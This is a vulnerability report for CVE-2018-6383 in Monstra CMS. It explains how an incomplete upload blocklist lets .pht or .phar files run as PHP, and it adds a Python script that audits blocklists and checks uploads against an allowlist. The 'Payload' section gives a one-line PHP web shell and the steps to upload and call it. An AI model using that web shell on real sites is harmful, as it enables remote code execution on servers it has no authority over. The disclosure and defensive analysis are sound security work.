CVE-2018-6383: Some extension can bypassed extension filter in uploading process · Issue #429 · monstra-cms/monstra

Monstra CMS through 3.0.4 has an incomplete “forbidden types” list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048.


Brief of this vulnerability
During the upload process, Monstra filters some dangerous extensions using a blacklist. The blacklist is incomplete, because the default configuration of “libapache2-mod-php” lets additional extensions execute as PHP scripts.

Test Environment

  • Apache/2.4.10 (Debian)
  • PHP 5.6.33-0+deb8u1 (cli)

Affected version
<=3.0.4

Payload

  1. Log in and go to http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager

  2. Save PHP code in a file with the ‘.pht’ extension and upload it, as below.

# cmd.pht
<?php system($_GET['c']);?>

  3. Click the uploaded file name, or
    go to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]

  4. Profit!

Reason for This Vulnerability
The default configuration of the php5 module for apache2 (libapache2-mod-php5) lets several extensions execute as PHP scripts. This is part of /etc/apache2/mods-enabled/php5.conf.

#/etc/apache2/mods-enabled/php5.conf
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
    # Deny access to raw php sources by default
    # To re-enable it's recommended to enable access to the files
    # only in specific virtual host or directory
    Require all denied
</FilesMatch>

Because of this config, the list of extensions that run as PHP scripts is
php, php3, php4, php5, pht, phtml
and the ‘phps’ extension is mapped to the PHP source handler, which shows the source code of a PHP file (this default config denies access to it).

But Monstra prevents uploads of PHP-style files with an extension filter in the upload process, in ./plugins/box/filesmanager/filesmanager.admin.php, as shown below.

#./plugins/box/filesmanager/filesmanager.admin.php
        $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht',
                                 'php', 'phtml', 'php3', 'php4', 'php5', 'phps',
                                 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',
                                 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');

Almost all of the extensions that execute as PHP are filtered, but ‘pht’ is not.

As a result, an attacker can upload a malicious PHP file using the pht extension.

Similarly, the default configuration of ‘libapache2-mod-php7.1’ looks like this.

#OS: ubuntu 17.10
#/etc/apache2/mods-enabled/php7.1.conf
<FilesMatch ".+\.ph(ar|p|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
    # Deny access to raw php sources by default
    # To re-enable it's recommended to enable access to the files
    # only in specific virtual host or directory
    Require all denied
</FilesMatch>

So the phar extension is also vulnerable in a PHP 7 environment.
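The gap described above is mechanical: the set of extensions Apache routes to the PHP engine comes from the FilesMatch regex, while Monstra's blocklist is a hand-maintained list, and the two are never compared. The following Python script is an added example (not code from the Monstra project or from the report) that audits a blocklist against a handler regex and contrasts it with an allowlist check. It takes the two FilesMatch patterns and the $forbidden_types list verbatim from the report; the candidate extension space is restricted to ‘ph’ plus up to three [a-z0-9] characters, which is exhaustive for these two patterns because both literally require ‘.ph’ (an assumption to revisit for other handler configs). The ALLOWED_UPLOAD_TYPES set and the upload_allowed function are constructed for illustration.

```python
import itertools
import re
import string

# FilesMatch patterns as quoted from the two Debian/Ubuntu Apache configs in the report.
# Apache FilesMatch uses PCRE; these particular patterns are valid Python regexes too.
PHP5_HANDLER_RE = r".+\.ph(p[345]?|t|tml)$"      # libapache2-mod-php5
PHP71_HANDLER_RE = r".+\.ph(ar|p|tml)$"          # libapache2-mod-php7.1

# Monstra's $forbidden_types blocklist as quoted from filesmanager.admin.php.
MONSTRA_FORBIDDEN_TYPES = {
    'html', 'htm', 'js', 'jsb', 'mhtml', 'mht',
    'php', 'phtml', 'php3', 'php4', 'php5', 'phps',
    'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',
    'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty',
}

ALPHABET = string.ascii_lowercase + string.digits


def candidate_extensions(prefix="ph", max_extra=3):
    """Yield every extension made of `prefix` plus up to `max_extra` [a-z0-9] characters.

    Assumption: both handler regexes on the page require a literal '.ph', so a
    'ph'-prefixed candidate space is exhaustive for them up to the length limit.
    FilesMatch is case-sensitive by default, so lowercase candidates suffice here.
    """
    for n in range(max_extra + 1):
        for tail in itertools.product(ALPHABET, repeat=n):
            yield prefix + "".join(tail)


def php_executable_extensions(handler_regex, candidates=None):
    """Return the set of candidate extensions the handler regex routes to the PHP engine."""
    pattern = re.compile(handler_regex)
    if candidates is None:
        candidates = candidate_extensions()
    # Apache matches the pattern against the file name; "upload." stands in for any base name.
    return {ext for ext in candidates if pattern.match("upload." + ext)}


def blocklist_gaps(handler_regex, forbidden_types):
    """Extensions Apache would execute as PHP that the blocklist fails to reject."""
    return php_executable_extensions(handler_regex) - set(forbidden_types)


# Constructed allowlist for the contrasting check: only types the application actually serves.
ALLOWED_UPLOAD_TYPES = {'jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'}


def upload_allowed(filename, allowed_types=ALLOWED_UPLOAD_TYPES):
    """Allowlist check: accept a name only if it has exactly one extension and that
    extension (compared case-insensitively) is in the allowlist. Unknown extensions
    are rejected by default, so a new handler mapping cannot silently widen what runs."""
    name = filename.rsplit('/', 1)[-1]
    parts = name.lower().split('.')
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1] in allowed_types


if __name__ == "__main__":
    for label, regex in (("php5", PHP5_HANDLER_RE), ("php7.1", PHP71_HANDLER_RE)):
        print(label, "executes:", sorted(php_executable_extensions(regex)))
        print(label, "blocklist gaps:", sorted(blocklist_gaps(regex, MONSTRA_FORBIDDEN_TYPES)))
    for fname in ("photo.JPG", "cmd.pht", "cmd.phar", "notes.php.txt"):
        print(fname, "->", "allowed" if upload_allowed(fname) else "rejected")
```

Running the audit against the two configs reports exactly the extensions the report identifies (pht for php5, phar for php7.1). The allowlist check makes the comparison unnecessary: it never needs to know which extensions the web server will execute, only which ones the application intends to store.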
